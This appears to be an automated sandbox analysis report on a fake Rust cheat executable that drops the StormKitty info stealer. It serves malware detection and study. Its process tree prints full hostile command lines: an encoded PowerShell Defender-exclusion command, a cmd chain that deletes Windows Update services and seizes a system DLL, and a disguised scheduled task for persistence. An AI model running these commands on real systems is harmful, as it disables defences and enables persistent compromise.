Analysis
-
max time kernel
135s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
12-08-2023 12:40
Static task
static1
Behavioral task
behavioral1
Sample
rustcheat.exe
Resource
win7-20230712-en
General
-
Target
rustcheat.exe
-
Size
4.4MB
-
MD5
50c839c62f01c2f2be0ff9eacdca3c84
-
SHA1
e747243b3d708857799e3d172412d5c8af99b02e
-
SHA256
d369a5d2ef50b7e9eea2e61b45294270c0a27cad70edb47cf61ba76f1810fad7
-
SHA512
1af308ce12056c988cdb5f50603e30357bfa7cc8a0c1d35b1a72e522fdcce23ddbd86c40b6a030a3ddafb1d01518edb511076e3b86e4c2af555d792824dec091
-
SSDEEP
98304:AV5/ubyrtiqzCy/5Tinwrnkw1/Qbhy0l/H9kx5TKMglVRA:Azub4l9/5JYKYbJ59kx5OMaVRA
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 7 IoCs
resource yara_rule behavioral1/files/0x000a00000001223c-66.dat family_stormkitty behavioral1/files/0x000a00000001223c-64.dat family_stormkitty behavioral1/files/0x000a00000001223c-67.dat family_stormkitty behavioral1/memory/2632-68-0x000000013F740000-0x000000013F790000-memory.dmp family_stormkitty behavioral1/memory/2632-72-0x0000000002160000-0x00000000021D4000-memory.dmp family_stormkitty behavioral1/memory/2232-73-0x000000001B380000-0x000000001B400000-memory.dmp family_stormkitty behavioral1/memory/2232-87-0x000000001B380000-0x000000001B400000-memory.dmp family_stormkitty -
Downloads MZ/PE file
-
Possible privilege escalation attempt 6 IoCs
pid Process 2908 icacls.exe 1496 takeown.exe 2900 icacls.exe 2072 takeown.exe 2464 icacls.exe 2144 takeown.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 4 IoCs
pid Process 2232 testy.exe 2632 StormKittyBuild.exe 1900 updater.exe 2948 updater.exe -
Loads dropped DLL 4 IoCs
pid Process 2588 rustcheat.exe 2588 rustcheat.exe 2124 taskeng.exe 2028 conhost.exe -
Modifies file permissions 1 TTPs 6 IoCs
pid Process 1496 takeown.exe 2900 icacls.exe 2072 takeown.exe 2464 icacls.exe 2144 takeown.exe 2908 icacls.exe -
resource yara_rule behavioral1/files/0x000600000001945d-98.dat vmprotect behavioral1/files/0x000600000001945d-124.dat vmprotect -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2876 sc.exe 1804 sc.exe 2728 sc.exe 880 sc.exe 2328 sc.exe 2576 sc.exe 2564 sc.exe 2268 sc.exe 2012 sc.exe 2220 sc.exe 2500 sc.exe 2760 sc.exe 2436 sc.exe 2020 sc.exe 2348 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2500 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1524 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 1812 taskkill.exe -
Modifies registry key 1 TTPs 27 IoCs
pid Process 2596 reg.exe 1972 reg.exe 3052 reg.exe 2404 reg.exe 840 reg.exe 1124 reg.exe 2540 reg.exe 2224 reg.exe 1680 reg.exe 1668 reg.exe 2412 reg.exe 2392 reg.exe 2952 reg.exe 2372 reg.exe 2568 reg.exe 1928 reg.exe 1724 reg.exe 1720 reg.exe 3036 reg.exe 2112 reg.exe 1632 reg.exe 2688 reg.exe 2652 reg.exe 280 reg.exe 1520 reg.exe 3012 reg.exe 1140 reg.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde StormKittyBuild.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 StormKittyBuild.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1920 powershell.exe 2232 testy.exe 1744 powershell.exe 1900 updater.exe 2352 powershell.exe 2940 powershell.exe 2948 updater.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 2632 StormKittyBuild.exe Token: SeShutdownPrivilege 2720 powercfg.exe Token: SeDebugPrivilege 2232 testy.exe Token: SeShutdownPrivilege 2784 powercfg.exe Token: SeShutdownPrivilege 2712 powercfg.exe Token: SeShutdownPrivilege 1784 powercfg.exe Token: SeTakeOwnershipPrivilege 1496 takeown.exe Token: SeDebugPrivilege 1812 taskkill.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeDebugPrivilege 1900 updater.exe Token: SeShutdownPrivilege 1828 powercfg.exe Token: SeShutdownPrivilege 2276 powercfg.exe Token: SeShutdownPrivilege 2084 powercfg.exe Token: SeTakeOwnershipPrivilege 2072 takeown.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 2948 updater.exe Token: SeShutdownPrivilege 2832 powercfg.exe Token: SeShutdownPrivilege 2240 powercfg.exe Token: SeShutdownPrivilege 1532 powercfg.exe Token: SeShutdownPrivilege 1768 powercfg.exe Token: SeTakeOwnershipPrivilege 2144 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2588 wrote to memory of 2232 2588 rustcheat.exe 28 PID 2588 wrote to memory of 2232 2588 rustcheat.exe 28 PID 2588 wrote to memory of 2232 2588 rustcheat.exe 28 PID 2588 wrote to memory of 2232 2588 rustcheat.exe 28 PID 2588 wrote to memory of 2632 2588 rustcheat.exe 29 PID 2588 wrote to memory of 2632 2588 rustcheat.exe 29 PID 2588 wrote to memory of 2632 2588 rustcheat.exe 29 PID 2588 wrote to memory of 2632 2588 rustcheat.exe 29 PID 2232 wrote to memory of 1920 2232 testy.exe 30 PID 2232 wrote to memory of 1920 2232 testy.exe 30 PID 2232 wrote to memory of 1920 2232 testy.exe 30 PID 2232 wrote to memory of 2132 2232 testy.exe 33 PID 2232 wrote to memory of 2132 2232 testy.exe 33 PID 2232 wrote to memory of 2132 2232 testy.exe 33 PID 2232 wrote to memory of 2732 2232 testy.exe 35 PID 2232 wrote to memory of 2732 2232 testy.exe 35 PID 2232 wrote to memory of 2732 2232 testy.exe 35 PID 2132 wrote to memory of 2876 2132 cmd.exe 36 PID 2132 wrote to memory of 2876 2132 cmd.exe 36 PID 2132 wrote to memory of 2876 2132 cmd.exe 36 PID 2132 wrote to memory of 1804 2132 cmd.exe 38 PID 2132 wrote to memory of 1804 2132 cmd.exe 38 PID 2132 wrote to memory of 1804 2132 cmd.exe 38 PID 2732 wrote to memory of 2720 2732 cmd.exe 39 PID 2732 wrote to memory of 2720 2732 cmd.exe 39 PID 2732 wrote to memory of 2720 2732 cmd.exe 39 PID 2132 wrote to memory of 2728 2132 cmd.exe 40 PID 2132 wrote to memory of 2728 2132 cmd.exe 40 PID 2132 wrote to memory of 2728 2132 cmd.exe 40 PID 2132 wrote to memory of 2760 2132 cmd.exe 41 PID 2132 wrote to memory of 2760 2132 cmd.exe 41 PID 2132 wrote to memory of 2760 2132 cmd.exe 41 PID 2732 wrote to memory of 2784 2732 cmd.exe 42 PID 2732 wrote to memory of 2784 2732 cmd.exe 42 PID 2732 wrote to memory of 2784 2732 cmd.exe 42 PID 2132 wrote to memory of 2436 2132 cmd.exe 43 PID 2132 wrote to memory of 2436 2132 cmd.exe 43 PID 2132 wrote to memory of 2436 2132 cmd.exe 43 PID 2132 wrote to memory of 2372 2132 cmd.exe 44 PID 2132 wrote to memory of 2372 2132 cmd.exe 44 PID 2132 wrote to memory of 2372 2132 cmd.exe 44 PID 2132 wrote to memory of 1632 2132 cmd.exe 45 PID 2132 wrote to memory of 1632 2132 cmd.exe 45 PID 2132 wrote to memory of 1632 2132 cmd.exe 45 PID 2732 wrote to memory of 2712 2732 cmd.exe 46 PID 2732 wrote to memory of 2712 2732 cmd.exe 46 PID 2732 wrote to memory of 2712 2732 cmd.exe 46 PID 2132 wrote to memory of 840 2132 cmd.exe 47 PID 2132 wrote to memory of 840 2132 cmd.exe 47 PID 2132 wrote to memory of 840 2132 cmd.exe 47 PID 2132 wrote to memory of 2688 2132 cmd.exe 48 PID 2132 wrote to memory of 2688 2132 cmd.exe 48 PID 2132 wrote to memory of 2688 2132 cmd.exe 48 PID 2132 wrote to memory of 2596 2132 cmd.exe 49 PID 2132 wrote to memory of 2596 2132 cmd.exe 49 PID 2132 wrote to memory of 2596 2132 cmd.exe 49 PID 2732 wrote to memory of 1784 2732 cmd.exe 50 PID 2732 wrote to memory of 1784 2732 cmd.exe 50 PID 2732 wrote to memory of 1784 2732 cmd.exe 50 PID 2132 wrote to memory of 1496 2132 cmd.exe 51 PID 2132 wrote to memory of 1496 2132 cmd.exe 51 PID 2132 wrote to memory of 1496 2132 cmd.exe 51 PID 2132 wrote to memory of 2900 2132 cmd.exe 52 PID 2132 wrote to memory of 2900 2132 cmd.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\testy.exe"C:\Users\Admin\AppData\Local\Temp\testy.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:2876
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1804
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:2728
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:2760
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:2436
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:2372
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:1632
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
PID:840
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:2688
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:2596
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2900
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3012
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1928
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1140
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1124
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:1696
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:2024
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:1076
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:1960
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:3004
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:2488
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:1752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""3⤵PID:1704
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""4⤵
- Creates scheduled task(s)
PID:2500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵PID:2348
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵PID:2032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat3⤵PID:1344
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:2540
-
-
C:\Windows\system32\taskkill.exeTaskKill /F /IM 26324⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\system32\timeout.exeTimeout /T 2 /Nobreak4⤵
- Delays execution with timeout.exe
PID:1524
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {34F6453D-8D3B-45D6-AC0B-C71CD6791D8A} S-1-5-21-377084978-2088738870-2818360375-1000:DSWJWADP\Admin:Interactive:[1]1⤵
- Loads dropped DLL
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exeC:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:760
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:2576
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:880
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:2328
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:2564
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:2220
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:1724
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:1680
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
PID:1972
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:2652
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:1720
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2464
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3036
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3052
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:2412
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:2392
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:1264
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:2864
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:1756
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:2792
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:2796
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:2840
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:2868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:2432
-
